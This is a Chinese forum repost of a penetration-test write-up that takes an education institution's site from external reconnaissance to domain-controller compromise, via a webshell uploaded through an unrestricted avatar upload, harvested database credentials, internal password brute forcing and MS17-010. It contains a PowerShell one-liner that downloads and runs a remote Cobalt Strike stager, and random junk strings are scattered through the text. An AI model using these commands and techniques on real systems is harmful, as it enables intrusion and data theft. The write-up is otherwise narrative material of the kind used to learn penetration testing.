|
5 n+ r& M" j2 [$ V: L9 d
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
6 s, i" b2 O1 L
k* I3 ~$ D1 X; e) P/ U2 b( Z; x$ k! ~ w( M+ G/ o
4 F3 M4 b$ }( t, t/ l # n& K! H! S, `& C- q( ]) _5 V
3 W, G# o0 P- _9 h- k- l' R: }
正文! C! E$ [9 ~8 o5 W) P& W! u
) N' t8 V* f( l! J: b( _3 a2 ?. n! h" C9 W! J% f
3 {( Y |; f: L- k
7 B% k1 L, V$ B/ ^5 B$ P5 t2 v7 E
# }$ Y; Q; ]* z; b8 M 目标:www.xxxx.com(一家教育机构)
5 ^- h4 I: ?: g' Z. g& r' ^打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
) A# P0 \% @$ e( A 7 H0 y- ~3 A% C) S8 ]
3 @" P5 M2 m2 l% [5 d$ P  0 p6 a7 M* v& X, w$ s
3 F9 {2 b' U3 m
6 D$ z# ]4 C7 [8 R6 G, }1 G
进行了简单的信息搜集
" X( {( Q# E- c% x! Z
# o1 g$ y/ l P' A6 p7 F5 w G: v5 t: Q
& m$ i4 F G* I
7 l" I5 R* A% E7 z* }: w3 h 子域名搜集/ T' q' I+ [6 ] @+ G
3 P; V' z, B& g, o$ H0 z' C8 A4 U& s
 0 _6 k5 ~) x- x- R- u
D' A, z0 @& U" P+ g& s
+ ^: b/ `5 q8 w: F$ T7 D
fofa找资产
1 n% Q, H& E% r8 B+ o/ C) Y. w" D
' V4 n' M8 h2 C6 H2 N, ?% d
' S* e8 } H! B
/ S7 z7 E( c. X- _
; @; ] k/ D" R 
6 M/ m. w7 W% I4 |; a# p
2 N5 `, {" A' N4 p9 i2 Y6 W
3 w$ H* T, ^1 g8 P |" e 一共七个资产。去重之后只有两个。
$ E; {% S. B1 Z$ Q5 P# Y2 y
: C7 a. S' S: l; n1 k- Z8 X k, ~
" m. N" u% P3 k/ M) m+ [+ ` _4 J4 `9 i3 Y/ E! [
, N% O; G: a( x* _% [ 目录探测7 m5 Z& a( ^. \
: y0 ^3 _/ g. }! p9 }9 I
! V3 ~) P% \4 F; ?0 V X2 N" H
: ^4 C% G* N' i C: f7 x$ E
+ Q( i S( ^( u' m4 E3 O3 i8 Z7 W: h4 N! w' r! |
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
% S9 i3 U! S J' u7 E
$ S+ y3 Q5 G' ?& C, ?
G* A: {$ I2 I
3 W4 h' c1 [5 t4 D6 z7 @
$ B& `& @' V: Y- s 我又尝试了通过修改返回包来绕过登录界面7 ~4 X a/ M0 k) p. x2 R" L
, P5 l! B: Y! ]* t# n
1 h/ I; K( I- N) Z1 Y; T% P7 }2 S 
5 O6 i1 f4 l7 b! h : B! V& ]# i! g! O8 [. i" w
; ?' w* Z% ~" T* E' d& k/ n 还是不行,尝试注入无果* [# v* @7 H8 u
/ Q! _% o! H$ k Z. u
% g. S* e+ p& K3 S( P+ r4 b 
H; s' [4 N! z6 x# n # k5 f ~0 Z1 C- n, g5 h4 C5 L
' |* ~2 b6 E2 x" d" f 不过我目录探测出了一处Spring信息泄露
: C; i8 U7 u: I8 @
/ |) g: v6 v, z. F, v+ @# z* n
& ~5 m) g2 f8 b+ w 1 ^. d) }6 \9 C
0 F0 M- `# J" n$ F
& J* y6 r7 x* K/ A% g! a8 Y- N
2 ~; Z$ I' i! O3 Y% f" ^( c4 n7 ]1 g) j
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录* z/ M0 T E* U! U9 T0 h
4 d( w/ b6 [& Z) U. M- d
/ h4 R* E' F6 N8 p; R* j  8 U4 D$ p- k1 R$ t2 x
; l7 i3 A" n9 v: u/ r0 R! j1 q4 ~6 o T
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。$ s$ o* f, T+ g" }
7 G# m' D4 k5 h6 {- {
, P( R. e- ?; k, x7 M6 i- v# S- W
7 [: T' ~. u* ~8 c
# r$ D; D$ e& d: Q- W8 y6 F- p( L! f& ^; \4 Z5 \( e$ J" R( @
获取有些师傅到这一步就手机抓包电脑测了。
2 \8 G6 T f0 y& a
& L2 G2 x0 N8 [# g
+ c4 Z5 D+ A5 ^5 j+ Q" |3 q X4 [ Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。) U$ t$ d0 v" T6 W7 P7 O% {" G A
6 N {- F& l$ G
) @: n5 ]! ]# R/ v 其中在一个公众号发现了小程序,可以进行注册。: f0 ~+ `* b5 i- J" X. {) |1 l! A
5 F) V8 e1 X: K" |6 Z) q$ y$ w* z0 K6 E' Q" B5 ?+ u, T) a
看到了头像上传,尝试上传获取WebShell
: e( X2 S8 X5 N: F; v 9 V) m$ {( e% A
. v& F: z+ @$ | 
1 j- Y8 g$ m7 f9 n . |# k. y' Z$ V
2 N i+ i: O1 P: d$ k! q3 s
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问! V3 E( q& x; O8 w! k
/ J/ @! [( h, E; O0 }1 D% t- @' q! Q$ V* ]8 J6 W
 0 y$ }( h- {. v( d- w( {
- x) V% e( q" ^9 U( F8 g% d2 f, o7 x7 s
' E2 Q$ x3 \* J% F 然后上了大马5 C7 m4 v+ j% } J0 } Q( e
# d( g$ P2 y6 h& g1 W" n
g8 T$ R1 @6 C 
) W+ O- ^4 o9 E- e5 ^. T! T ' f, J& W5 t' ?( P+ G
+ N5 \! s/ }# _6 ^$ F5 W8 M
 5 I4 q4 L) A4 ?% A/ j" z
3 E: ]& w" E% ~2 w5 i; v
# e0 Q c4 T* l" ]: k 通过翻找文件发现数据库账号密码7 b# \! f$ e% H: n
) L2 c9 ?5 c$ G7 Y+ W' I& r
4 ^2 v; w% V8 J8 y; t  # l H' Q8 l" S5 ]1 x; i* P/ b
+ \9 T5 I! B) M3 G- i5 f$ Y3 z+ k" [6 S& x# ~ S
--内网渗透
7 L- A/ @9 i7 [, T: l 9 k% |+ o& |) {. K) P3 g% f/ R# q
9 C4 Q& D# P) K2 R3 v" @ 直接通过powershell执行 cs上线. v+ i/ F" a2 l5 \
" S( l$ t( N. j# Q. Y, M/ {
x/ L6 C5 s0 Y& n
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))": Q$ o, _ d- E
- L$ n0 c3 Y$ f% t, p/ a1 j9 N& r' `+ x0 r$ x3 s1 T' k. R5 s# j
 ) B5 @7 B& A9 t
$ |/ v' a5 E2 @+ T& M
8 e. t$ N* `: y8 g. O2 R 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破7 q0 M L; C% N3 C
! f3 Q' N+ i; W6 Q7 ]' |
5 @$ J+ h$ k+ `, _1 f9 @3 ~7 j! @
 $ V2 {, I7 K( e- Y' ]/ O* k! `' x
% n' d; t; [/ M3 J. D
0 P" ]) C+ U9 Y$ Q( b
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
5 Z7 v( V. M. y
9 R+ s/ x- `9 {& [& H% b* C
/ S4 I+ @& C( O; ~4 g7 ]) a
, I5 ]0 I3 `+ j5 r; y* n0 g
0 T# y! G. g' U; x6 j1 ]2 u1 y6 D) S
3 R5 a* Q6 V+ I- N* }' ~) p0 _5 t 
( X; C: e9 \1 w( S $ `5 H& ^/ \/ v" Q
' o) Q. T& R0 Q' W# Y. _, K 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
% _8 W6 H4 Q( g, q7 Y
5 O9 Z+ C7 w$ _3 Y0 O/ g3 @
4 P* E7 P4 t& Y) Z 6 t9 |- {! X; ?7 T! N
4 T7 o, ?1 N6 m* [0 w1 ?8 O- ?6 E  C$ B/ }! P8 i& K6 R
5 O# j2 x: M7 n+ e& [
2 U( R7 l% O8 L! D; K( q
9 k7 w2 G" y( }& X; ^6 X
$ G& `9 B3 U( o$ S7 H; J3 d K( Y8 L! e' @3 P! O7 a( X& r$ j/ I
. \2 U% j/ Z4 m* F
; ]' l9 R; X+ f4 x" c! W8 a3 D
4 @0 \& ]* E1 O3 X2 B: |
1 F0 G5 _, Q) N* t/ i; n; k9 n
. {; M3 e+ a. c4 Q+ _! W" a+ p" L 小结
k! D! [( a) T- V* _- d. r" M
/ y+ E, d/ |) }1 N3 D V& @" `$ E7 W0 A
/ G' f% T/ p6 a+ M
; x: z" _. \3 w$ k% Y6 ^( b% a$ }& M. _" v n+ {2 d
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
; W; l( S, j* R - w. _: H# m7 X& x, u7 c
0 E* h9 g* w7 F$ n
) ~4 q. T# z: s/ y# i, X* {
6 [% y7 w: S" @) k; {* S' h( W5 I5 J
-
; |9 G1 Q: t2 X3 X) d; u- t
% x, p: I; }9 \. c2 }1 ^% A9 @
# n: P7 Z9 x" d4 `; C! A -
! Z/ h9 a" [: \# ]- l" N/ q
. @+ E' |& @, X
6 ~4 q2 F( {9 y8 B" y! b " q" \8 p# [' B
; h4 z3 W' L5 G1 N) o* R0 s7 v' Z% y
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html/ m1 X4 \' c/ Z$ J
/ t0 U2 C+ ]5 P4 O
0 [% ~0 ~. x9 d- k, a8 v
W8 e" C* \6 K2 ^/ @1 ] | 
发表于 2024-3-1 19:41:32